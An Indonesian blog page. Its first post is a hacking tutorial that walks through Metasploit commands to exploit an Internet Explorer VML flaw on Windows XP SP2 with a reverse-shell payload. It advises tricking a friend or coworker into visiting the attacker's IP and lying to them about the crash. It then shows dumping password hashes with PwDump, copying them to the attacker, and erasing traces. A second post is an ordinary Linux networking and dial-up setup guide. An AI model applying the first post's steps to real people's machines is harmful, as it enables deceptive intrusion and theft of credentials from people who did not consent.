Pages

Subscribe:

Friday, March 28, 2008

Belajar Hack Yuck! (3) - Hack Windows XP SP2

*Fyuhh… akhirnya sempet juga nyelesain tulisan ini. Yosh.. here is the prof of concept!.
Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.
Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.
Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.
Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.
Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!
Pertama2 jalankan ‘mfsconsole’!

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.
Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
Untuk melihat info dari exploit ini gunakan perintah :
msf > info ie_vml_rectfill
Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja ).
Untuk menggunakan exploit gunakan perintah2 berikut dalam console :
msf > use_ie_vml_rectfill
msf > set PAYLOAD win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
Hasilnya akan tampak seperti gambar berikut :


Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus
Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack da Password!
Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!
Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah
C:\temp\Pwdump –o pass.txt 127.0.0.1
Klo berhasil akan tampak pada gambar berikut.

Lalu copy file pass.txt ke komputer kita
C:\temp\copy pass.txt z:
Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).
Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.
Happy Hacking…..

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.
1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.
2. Patch Windows anda.
3. Gunakan antivirus dengan update terbaru
4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p

Tuesday, March 25, 2008

Setting Jaringan di Linux

Menyambung artikel tentang perintah dasar pada Linux, maka penulis akan menjelaskan lebih lanjut tentang setting jaringan di Linux yang mungkin berguna bagi mereka yang baru belajar tentang Linux.Linux mempunyai keunggulan di bidang jaringan, karena selain bisa menjadi client juga bisa menjadi server pada saat yang bersamaan. Hal ini sangat membantu, terutama bagi para programmer dan webmaster yang membutuhkan penggunaan server. Terutama bagi mereka yang menggunakan apache, cgi dan php.

Selain itu Linux juga memiliki kelebihan untuk bisa berhubungan dengan sistem operasi lainny, seperti: Windows 9.x, Windows ME, Windows 2000, Windows XP, Mac OS, Amiga, Atari, Sun, dan keluarga Unix lainnya.

Segala kelebihan tersebut di atas tentunya akan sia-sia jika kita tidak bisa menghubungkan komputer Linux kita dengan jaringan komputer lainnya. Untuk itu, penulis mencoba memberikan sedikit tips untuk menghubungkan komputer Linux kita dengan jaringan komputer lainnya.

Dalam artikel ini, penulis membahas setting jaringan dengan metoda konvensional, dengan alasan:

Setting jaringan pada setiap distribusi berbeda antara satu dan lainnya.
Agar kita tidak menjadi manja dan menjadi bodoh dengan setting konfigurasi yang serba otomatis, sebagaimana sistem operasi lain :).
Capek nulisnya :)).
Pada saat menulis artikel ini, penulis menggunakan SuSE Linux 7.0, jadi jika ternyata ada perbedaan nama directory mohon dimaklumi. Karena aku tidak bisa hidup tanpa SuSE :)).
Penulisan ini berdasarkan pengalaman penulis sendiri, dari mulai tidak bisa menjadi tidak tahu. Untuk itu bila ada kekurangan harap maklum, karena diperuntukkan bagi mereka yang masih pemula :).
Gambar 1. Jaringan Multiplatform

Setting Jaringan Dasar
Setting jaringan dasar merupakan langkah awal kita dalam rangka menghubungkan diri dengan komputer tetangga :). Adapun langkahnya adalah sebagai berikut:

Setting Kartu Jaringan
Pastikan komputer anda telah terpasang kartu jaringan, saat ini di pasaran telah beredar banyak sekali macam & jenis kartu jaringan. Untuk mudahnya, usahakan memilih kartu jaringan yang banyak dipakai, misalnya kompatibel ne2000 pci dengan kecepatan standard 10/100M.
Anda juga bisa menggunakan kartu jaringan lama, versiISA atau ISA Plug&Play, pastikan anda mengetahui alamat yang digunakan, bisa melalui disket bawaan, kemudian anda mencatatnya untuk diinstalasi di sistem Linux.
Pastikan kernel mengenali kartu jaringan anda, dengan mengetikkan perintah:4.
masaji@masaji.netThis email address is being protected from spam bots, you need Javascript enabled to view it:~ $> dmesg 5. --------- dipotong -----------6. Serial driver version 4.27 with HUB-6 MANY_PORTS MULTIPORT SHARE_IRQ enabled7. ttyS00 at 0x03f8 (irq = 4) is a 16550A8. ttyS01 at 0x02f8 (irq = 3) is a 16550A9. 3Com 3c90x Version 1.0.0 1999 <
linux_driver@3com.comThis email address is being protected from spam bots, you need Javascript enabled to view it> (20:28:04)10. enable_irq() unbalanced from c402451011. Installing knfsd (copyright (C) 1996
okir@monad.swbThis email address is being protected from spam bots, you need Javascript enabled to view it)12. nfsd_fh_init : initialized fhcache, entries=512
atau dengan cara ketikkan perintah:
root@masaji:/home/masaji $> ifconfigeth0 Link encap:Ethernet HWaddr 00:50:DA:C8:A6:5A inet addr:192.168.1.254 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:609275 errors:0 dropped:0 overruns:0 frame:0 TX packets:397967 errors:38 dropped:0 overruns:0 carrier:39 collisions:0 txqueuelen:100 Interrupt:11 Base address:0xd800 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:3924 Metric:1 RX packets:99 errors:0 dropped:0 overruns:0 frame:0 TX packets:99 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0
Pada dasarnya, hampir semua distro Linux sudah mengaktifkan modul kernel untuk pengenalan kartu jaringan.
Jika ternyata kernel belum mengenali kartu jaringan anda, yang ditunjukkan dengan menampilkan "lo" tanpa eth0. Anda bisa mengaktifkannya dengan membuka /etc/rc.d/rc.modules.
Jika anda tidak dapat menemukan /etc/rc.d/rc.modules., anda bisa mencarinya di /lib/modules/net atau di /etc/conf.modules untuk melihat konfigurasi modul-modul yang aktif. Sebagaimana modul kartu jaringan di /lib/modules/net berikut ini: 15. masaji@masaji:/lib/modules/2.2.18/net $> ls16. 3c501.o comx-proto-lapb.o hp100.o sb1000.o17. 3c503.o comx-proto-ppp.o ibmtr.o sbni.o18. 3c505.o comx.o ipddp.o scc.o19. 3c507.o cops.o ircomm.o sdla.o20. 3c509.o cosa.o irda.o sdladrv.o21. 3c515.o cs89x0.o irda_deflate.o sealevel.o22. 3c59x.o de4x5.o irlan.o shaper.o23. 3c90x.o de600.o lance.o sis900.o24. 6pack.o de620.o lanstreamer.o sk98lin.o25. 8139too.o depca.o lapbether.o skfp.o26. 82596.o dgrs.o lne390.o sktr.o27. 8390.o dlci.o ltpc.o slhc.o28. ac3200.o dmascc.o mkiss.o slip.o29. acenic.o dmfe.o n2.o smc-ultra.o30. arc-rimi.o dummy.o ne.o smc-ultra32.o31. arcnet.o e100.o ne2k-pci.o smc9194.o32. arlan-proc.o e1000.o ne3210.o soundmodem.o33. arlan.o e2100.o ni5010.o starfire.o34. at1700.o eepro.o ni52.o strip.o35. baycom_epp.o eepro100.o ni65.o syncppp.o36. baycom_par.o eexpress.o old_tulip.o tlan.o37. baycom_ser_fdx.o epic100.o olympic.o tulip.o38. baycom_ser_hdx.o eql.o pc300.o via-rhine.o39. bonding.o es3210.o pci-scan.o wanpipe.o40. bpqether.o eth16i.o pcnet32.o wanxl.o41. bsd_comp.o ethertap.o plip.o wavelan.o42. c101.o ewrk3.o ppp.o wd.o43. com20020.o fmv18x.o ppp_deflate.o x25_asy.o44. com90io.o hamachi.o ppp_mppe.o yam.o45. com90xx.o hdlc.o pppox.o yellowfin.o46. comx-hw-comx.o hdlcdrv.o rcpci.o z85230.o47. comx-hw-locomx.o hostess_sv11.o rl100a.o48. comx-hw-mixcom.o hp-plus.o rrunner.o49. comx-proto-fr.o hp.o rtl8139.o
Kemudian untuk mengaktifkannya, anda bisa mengetikkan perintah:root@masaji:~ $> modprobe ne2k-pci
Untuk menyertakannya ke dalam modul, sehingga setiap saat bisa dijalankan secara otomatis pada saat start komputer, sertakan ke dalam file conf.modules. Misalnya sebagaimana contoh di bawah ini:52. masaji@masaji:/etc $> more conf.modules53. #54. # Copyright (c) 1996-2000 SuSE GmbH Nuernberg, Germany. All rights reserved.55. #56. # Author: Hubert Mantel <
mantel@suse.deThis email address is being protected from spam bots, you need Javascript enabled to view it>, 1996-200057. #58. # Configuration file for loadable modules; used by modprobe and kerneld#59. # Aliases - specify your hardware60. alias eth1 off61. alias tr0 off62. alias scsi_hostadapter off63. alias fb0 off64. # only used for Mylex or Compaq Raid as module65. alias block-major-48 off66. alias block-major-49 off67. alias block-major-72 off68. alias block-major-73 off69. # only needed for fifth and sixth IDE adaptor70. alias block-major-56 off71. alias block-major-57 off72. # mouse (for older busmice)73. alias char-major-10 off74. alias parport_lowlevel parport_pc75. options parport_pc io=0x378 irq=none,none76. ;77. ------------dipotong---------------78. ;79. # post-install paride insmod frpw80. # YaST2: Network card81. alias eth0 ne2k-pci
Mengaktifkan Alamat IP Ethernet
Langkah selanjutnya, adalah mengaktifkan alamat IP ethernet, sehingga komputer kita bisa dikenal oleh server & komputer lain pada jaringan. Untuk mengaktifkan alamat IP ethernet, anda bisa mengetikkan perintah di bawah ini:

root@masaji:~ $> ifconfig eth0 192.168.1.1 broadcast 192.168.1.255 netmask 255.255.255.0

Untuk mengaktifkan konfigurasi alamat IP eth baru kita, jalankan script /etc/rc.d/init.d/network dengan option 'restart', seperti di bawah ini:

root@masaji:~ $> /etc/rc.d/init.d/network restart

Agar alamat ip komputer kita bisa berjalan secara otomatis, maka perintah ifconfig tsb. di atas perlu dimasukkan kedalam skrip khusus. Untuk beberapa distribusi bisa dimasukkan kedalam rc.local. Sedangkan distro SuSE terdapat dalam file /etc/rc.config. Adapun contohnya adalah seperti berikut ini:
## IP Adresses#IPADDR_0="192.168.1.1"IPADDR_1=""IPADDR_2=""IPADDR_3="" ## network device names (e.g. "eth0")#NETDEV_0="eth0"NETDEV_1=""NETDEV_2=""NETDEV_3="" ## parameteres for ifconfig, simply enter "bootp" or "dhcpclient" to use the# respective service for configuration# sample entry for ethernet:# IFCONFIG_0="192.168.81.38 broadcast 192.168.81.63 netmask 255.255.255.224"#IFCONFIG_0="192.168.1.1 broadcast 192.168.1.255 netmask 255.255.255.0"IFCONFIG_1=""IFCONFIG_2=""IFCONFIG_3=""
Sampai di sini selesailah sudah setting jaringan Linux tahap awal, jika anda menghendaki mempunyai virtual domain sendiri yang dikenal oleh komputer tetangga sebelah (pak RT), silakan masuk ke tahap server DNS.

Setting Server DNS
DNS merupakan singkatan dari Domain Name Server, merupakan sebuah database yang berisi daftar seluruh nama komputer yang terhubung ke jaringan lokal (intranet).

Gambarannya, jika anda mempunyai jaringan komputer yang berisi 5 pc yang terhubung ke komputer server, dan anda ingin menghubungi server melalui browser secara intranet (lokal) ke alamat http://server.net, pc anda akan mencarinya dulu di /etc/resolc.conf untuk mencari nama komputer server. Setelah terhubung, name server akan meneruskan ke database root, jika ketemu maka server akan merespon balik, dengan memberikan informasi mesin yang menggunakan nama server.net ke pc anda

Untuk membuat sebuah server DNS, pertama kali anda harus menginstalasi bind versi 8.2.x, dengan perintah:

rpm -ivh bind8-8.2.3-36.rpm

Setelah terinstalasi, sekarang silakan anda mengedit file /etc/resolv.conf, isinya seperti berikut ini:
search .domain nama.isp.andadomain server.netnameserver 202.x.x.xnameserver 192.168.1.1
Kemudian silakan edit file /etc/named.conf, isinya seperti berikut ini:
/* sample configuration file for BIND 8.1 or later * should be installed as /etc/named.conf * * Author: Florian La Roche */ ## overall options of the server#options { directory "/var/named"; # the default is to fail, if the master file is not correct check-names master warn; pid-file "/var/run/named.pid"; datasize default; stacksize default; coresize default; files unlimited; recursion yes; multiple-cnames no; // if yes, then a name my have more // than one CNAME RR. This use // is non-standard and is not // recommended, but it is available // because previous releases supported // it and it was used by large sites // for load balancing. # the default is to ask the forwarders and if they fail # try to find the answer yourself, this will only ask the forwarders #forward only; # list of DNS servers to ask #forwarders { # 192.168.1.1; # 192.168.1.2; # 192.168.1.3; #}; # the default is to listen on port 53 on all available interfaces # you can also give a detailed list: #listen-on { 5.6.7.8; }; #listen-on port 1234 { !1.2.3.4; 1.2/16; };}; ## do not be verbose about these problems...##logging {# category lame-servers { null; };# category cname { null; };#}; ## predefined access control lists (acl):# "any" allows all hosts# "none" denies all hosts# "localhost" allows the IP adresses of all interfaces of the system# "localnets" allows any host on a network of the local interfaces## defining an additional ACL:#acl can_download { 192.168.0.17; 192.168.0.18; }; ## The server statement defines the characteristics to be associated with# a remote name server.## Marking a server as bogus will prevent queries to that server.#server 192.168.0.128 { bogus yes; }# If the other name server has also BIND 8.1 or newer installed, you# can allow compacter zone transfers with this statement.#server 192.168.0.128 { transfer-format many-answers; } zone "." IN { type hint; file "root.hint";}; zone "localhost" IN { type master; file "localhost.zone"; check-names fail; allow-update { none; };}; zone "0.0.127.in-addr.arpa" IN { type master; file "127.0.0.zone"; check-names fail; allow-update { none; };}; ## a master zone##zone "isc.org" IN {# type master;# file "isc.org";# # by default, any host can receive zone transfers# #allow-transfer { any; };# notify yes;#}; ## a slave zone##zone "isc.org" IN {# type slave;# file "slave/db.isc.org";# masters { 192.168.0.128; };#};

Kemudian, sisipkan perintah berikut ini:forwarders { x.x.x.x; y.y.y.y; };,

Dimana:x: merupakan server utama, dany: merupakan server kedua

Pada contoh di atas, kalimat forwarders, sudah tersedia. Anda tinggal menghilangkan tanda # dan mengubah nomor ip sesuai dengan komputer anda.

Untuk memastikan server DNS berjalan pada saat komputer dinyalakan, ketikkan perintah berikut:

root@masaji:~ $> chkconfig named on

Kemudian jalankan server DNS, dengan mengetikkan perintah:

/etc/rc.d/init.d/named start

Agar komputer anda dikenal nama doamin-nya oleh server dan sebaliknya isikan nama domain komputer anda pada server atau nama domain server pada komputer anda ke dalam file /etc/hosts, seperti tampak pada contoh di bawah ini:
## hosts This file describes a number of hostname-to-address# mappings for the TCP/IP subsystem. It is mostly# used at boot time, when no name servers are running.# On small systems, this file can be used instead of a# "named" name server.# Syntax:## IP-Address Full-Qualified-Hostname Short-Hostname## special IPv6 addresses 127.0.0.1 localhost192.168.1.2 masaji.net masaji192.168.1.1 server.net server::1 localhost ipv6-localhost ipv6-loopbackfe00::0 ipv6-localnet ff00::0 ipv6-mcastprefixff02::1 ipv6-allnodesff02::2 ipv6-allroutersff02::3 ipv6-allhosts
Sampai di sini pc anda sudah bisa berhubungan ke server dan sebaliknya. Namun, jika anda ingin mempunyai server web, server ftp dan server mail sendiri, ikuti langkah selanjutnya.

Teknik Hubungan Dial-up ke Internet
Persiapan Interface & DNS untuk sambungan ke Internet
Pada bagian ini akan dijelaskan beberapa perangkat yang dapat membantu server anda untuk men-dial ISP. Juga akan diterangkan cara untuk menjaga agar kerahasiaan account yang anda miliki agar tidak dipergunakan oleh pihak lain yang tidak bertanggung jawab. Namun sebelum anda melakukan koneksi sebaiknya anda cek terlebih dahulu setting DNS (Doman Name Server). Biasanya setting tersebut ada di file /etc/resolve.conf agar di set supaya name server (NS) ISP menjadi salah satu acuan pada saat proses resolve nama. Di samping itu, anda juga bisa memberikan alternatif NS server yang lain yang dapat disertakan dalam file tersebut. Contoh isi dari file /etc/resolve.conf sbb:
search .domain isp1.net.id isp2.net.iddomain isp1.net.id isp2.net.idnameserver 202.xxx.xxx.xxxnameserver 202.yyy.yyy.yyynameserver 202.zzz.zzz.zzz
Untuk melakukan pengecekkan apakah anda atau komputer server anda yang menggunakan SO Linux sudah terhubung dengan ISP atau belum, anda bisa menggunakan perintah ifconfig yang akan menampilkan setting interface ke jaringan. Yang perlu kita cari adalah setting interface ppp0 yang merupakan interface modem serial yang menghubungkan server Linux ke ISP secara Point-to-Point. Dari informasi tersebut kita nantinya dapat memastikan bahwa memang server anda akan dapat melakukan routing klien ke internet, anda bisa menggunakan perintah route untuk mengecek routing dari server anda menuju ke ISP tujuan. Untuk tampilan yang akan anda peroleh kurang lebih sebagai berikut :
[masaji@server /root]# ifconfig lo Link encap Local Loopbackinet addr 127.0.0.1 Bcast 127.255.255.255 Mask 255.0.0.0UP LOOPBACK RUNNING MTU 2000 Metric 1RX packets 0 errors 0 dropped 0 overrun 0TX packets 0 errors 0 dropped 0 overrun 0 eth0 Link encap:Ethernet HWaddr 00:E0:18:C1:CD:A5 inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:410903 errors:0 dropped:0 overruns:0 frame:5162TX packets:403208 errors:0 dropped:0 overruns:0 carrier:2839collisions:31500 txqueuelen:100 Interrupt:10 Base address:0x1800 ppp0 Link encap Point-to-Point Protocolinet addr 202.152.1.129 P-t-P 202.152.1.44 Mask 255.255.255.255UP POINTOPOINT RUNNING MTU 576 Metric 1RX packets 33 errors 0 dropped 0 overrun 0TX packets 42 errors 0 dropped 0 overrun 0 [root@server /root]# routeKernel IP routing tableDestination Gateway Genmask Flags Metric Ref Use Iface192.168.0.1 * 255.255.255.255 UH 0 0 0 eth0202.152.1.129 * 255.255.255.255 UH 0 0 0 ppp0192.168.0.0 * 255.255.255.0 U 0 0 0 eth0127.0.0.0 * 255.0.0.0 U 0 0 0 lodefault 202.159.1.44 0.0.0.0 UG 0 0 0 eth0
Perhatikan pada tampilan perintah route ada paling tidak tiga (3) interface (Iface) yaitu eth0, ppp0 & lo. Eth0 adalah interface ethernet ke LAN yang mempunyai alamat IP 192.168.1.1, ppp0 adalah interface ke ISP yang memperoleh IP dari ISP secara dinamik dalam hal ini yang di peroleh adalah 202.152.1.129, sedang interface lo adalah untuk local loopback dengan IP yang standar 127.0.0.1.

Langkah selanjutnya adalah menghubungkan server anda ke Internet. Salah satu cara yang relatif paling mudah yang bisa dilakukan adalah dengan menggunakan saluran telepon dial-up ke Internet. Pada server yang sederhana dengan jumlah klien yang terbatas dan dengan dana yang terbatas, dapat menggunakan koneksi dial-up yang memiliki biaya lebih murah dibandingkan dengan dedicated line. Jenis koneksi dial-up ke ISP pun sebenarnya berbagai macam antara lain SLIP, CSLIP ataupun PPP, tergantung mode yang di support oleh ISP anda. Kebanyakan ISP di Indonesia mendukung koneksi model PPP.

Untuk hubungan dial-up point-to-point antara Server Linux dengan ISP, sebenarnya kita dapat menggunakan beberapa alternatif pilihan:

kita bisa menggunakan script ppp sederhana (slackware)
bisa menggunakan perangkat lunak dip yang ada di paket instalasi Linux (RedHat),
minicom yang juga sudah terdapat dalam paket Linux (RedHat)
wvdial yang bisa anda download atau anda dapatkan secara gratis di internet, pada distribusi SuSE secara default menggunakan jenis ini.

Dengan pertimbangan kemudahan dan efektifitas penggunaan, maka penulis mengajak anda untuk membahas mengenai penggunaan program aplikasi wvdial.

Koneksi dengan menggunakan wvdial
Cara lain yang lebih mudah untuk menyambungkan diri ke internet, adalah dengan menggunakan program program bantu seperti Kppp, EzPPP, kinternet, atau wvdial, kami hanya akan menjelaskan cara yang terakhir yaitu dengan menggunakan wvdial, karena cara ini tergolong sangat mudah dan terbukti cukup efektif, Wvdial mampu mengantisipasi berbagai bentuk login prompt dan dapat secara otomatis mendeteksi apakah ISP anda menggunakan chap, pap atau tidak dan memberikan option pppd yang paling pas untuk koneksi anda.

Selain itu wvdial mudah dalam penggunaan, pengkonfigurasian untuk melakukan dial ke ISP yang bersangkutan, juga program ini akan secara otomatis mendeteksi bila terjadi kesalahan atau kegagalan pada waktu melakukan dial ke ISP. Bila ada kegagalan atau kesalahan yang menyebabkan koneksi ke ISP terputus, maka program ini tidak akan terhenti akan tetapi akan terus melakukan dial ke ISP secara otomatis hingga program ini benar-benar dihentikan. Bila karena suatu kesalahan di konsol Linux kita melakukan penghentian terhadap program pppd, dan bila program wvdial ini masih berjalan maka secara otomatis program wvdial ini akan terus melakukan dial dan menghidupkan kembali pppd. Bagi anda peminat X-Window, ada juga program seperti ini yang berjalan pada lingkungan KDE yaitu kwvdial.

Program ini dapat anda download dan dapatkan dengan gratis source code-nya, juga informasi mengenai program ini secara lengkap di internet pada situs :http://www.worldvisions.ca/wvdial/

atau site site linux terkemuka seperti www.linuxberg.com, www.freshmeat.com, ataupun www.linux.com. Setelah anda mendownload wvdial, anda akan memperoleh file bernama (kira-kira / atau versi yang lebih baru): wvdial-1.20.tar.gz

silakan anda login sbg root dan kemudian un-compress dan extract file tersebut ke direktori source anda (misalnya di /usr/local/src) dengan cara:
# gunzip wvdial-1.20.tar.gz# tar -xvf wvdial-1.20.tar
nanti anda akan menemukan direktori baru bernama: wvdial-1.20silakan anda masuk ke direktori tersebut :cd wvdial-1.20

di dalam direktori tersebut terdapat beberapa file:
[root@localhost wvdial-1.20]# lsANNOUNCE Makefile configfile/ rules.mk wvdial/ wvver.hCHANGES README debian/ streams/ wvdial.1COPYING.LIB TODO@ ppp.provider utils/ wvdialconf.1
karena wvdial di distribusikan dalam source code, maka anda harus melakukan kompilasi terlebih dahulu agar bisa digunakan. Sebelum anda melakukan kompilasi terhadap wvdial, pastikan terlebih dahulu bahwa anda telah memasang beberapa paket berikut ini:

pppd 2.2.0f , 2.3.5 atau yang lebih baru
gcc 2.7.2 atau lebih baru, dgn g++
GNU make; mungkin anda membutuhkan versi 3.75 atau lebih baru.
Kebanyakan distribusi Linux sekarang SUDAH menyertakan prasyarat tersebut! atau bahkan mungkin sudah menyertakan wvdial kedalam paketnya (Redhat sejak versi 6.1). Nah anda sudah siap untuk mengkompilasi wvdial. Untuk mengkompilasi aplikasi ini dapat anda ikut langkah-langkah berikut :

Buka file hasil download anda yang biasanya dalam bentuk file terkompres.[root@server /root]# tar zxvf wvdial-1.40.tar.gz
Masuk ke dalam direktori tempat kode sumber wvdial tersebut dan lakukan langkah-langkah kompilasi hingga instalasi: 3. [root@server /root]# cd wvdial-1.404. [root@server wvdial-1.40]# make [root@server wvdial-1.40]# make install

Untuk membersihkan sampah dari hasil kompilasi setelah anda selesai menginstalasi program ini dan untuk menghemat tempat penyimpanan anda, anda bisa memberikan perintah :[root@server wvdial-1.40]# make clean
Untuk meng-uninstall program yang telah anda instalasi, anda dapat memberikan perintah :[root@server wvdial-1.40]# make uninstall
secara defaultnya wvdial akan menginstall wvdial dan wvdialconf pada direktori /usr/local/bin dan manual pagenya di /usr/local/man/man1

jika anda menggunakan redhat silakan pindahkan manualnya ke direktori /usr/man/man1 dgn perintah :
mv /usr/man/man1/wvdial* /usr/man/man1
Untuk membuat konfigurasi program wvdial ini, anda dapat membuat file wvdial.conf secara manual yaitu dengan menggunakan editor yang anda senangi pada lingkungan Linux dan anda bisa mencontoh konfigurasi yang ada berikut ini. File ini biasanya disimpan di dalam direktori /etc.
[Dialer Defaults]Modem = /dev/ttyS1 à port tempat modem beradaBaud = 115200Init1 = ATZInit2 = ATQ0 V1 E1 S0=0 &C1 &D2 S11=55 +FCLASS=0Init3 = ATM1Dial Command = ATDT #Stupid Mode = 1 à akan mengeksekusi pppd tanpa menunggu loginNew PPPD = 1Phone = 080989999Username = telkomnet@instanPassword = telkom [Dialer ISP1]Phone = 564645Username = userkuPassword = passku [Dialer ISP2]Phone = 564647Username = usernyaPassword = passnya
Selain itu, anda juga dapat membuat file konfigurasi tersebut dengan menggunakan program yang memang sudah disediakan untuk membuat konfigurasi secara otomatis dengan sekalian mendeteksi keberadaan modem yang ada pada komputer anda beserta dengan konfigurasi dari modem tersebut. Anda bisa menggunakan program wvdialconf.
[root@masaji /root]# wvdialconf /etc/wvdial.conf
Perintah tersebut akan membuat file wvdial.conf baru dalam direktori /etc dengan konfigurasi modem yang berhasil dideteksi oleh program tersebut. Meskipun demikian anda tetap perlu mengedit untuk memasukkan beberapa informasi untuk melakukan dial ke ISP anda.

Untuk menjaga keamanan dari user anda dan password anda agar tidak digunakan oleh orang lain, anda dapat melindungi file wvdial tersebut dengan mengubah hak akses dan kepemilikannya sehingga hanya anda sebagai super user (root) yang bisa membaca dan menulis ke dalam file konfigurasi tersebut.

Dalam file konfigurasi tersebut terdapat beberapa macam dialer yang bisa kita gunakan dengan konfigurasi yang berbeda. Ini dimaksudkan agak anda dapat memasukkan informasi mengenani beberapa ISP yang berbeda. Untuk penamaan dialer terserah dari keinginan anda namun satu hal yang perlu diperhatikan bahwa pada setiap konfigurasi terdapat satu dialer default dengan nama Default dimana bila kita mengeksekusi program ini jika tidak ada nama unik yang menandakan dialer mana atau ISP mana yang kita dial maka secara otomatis program akan mengambil informasi yang terdapat dalam konifgurasi dalam tag ini.

Setelah anda selesai mengkonfigurasikan wvdial anda dalam file wvdial.conf, maka anda siap melakukan dial ke ISP anda dan tampilan dan pesan yang akan anda peroleh kurang lebih akan nampak sebagai berikut :
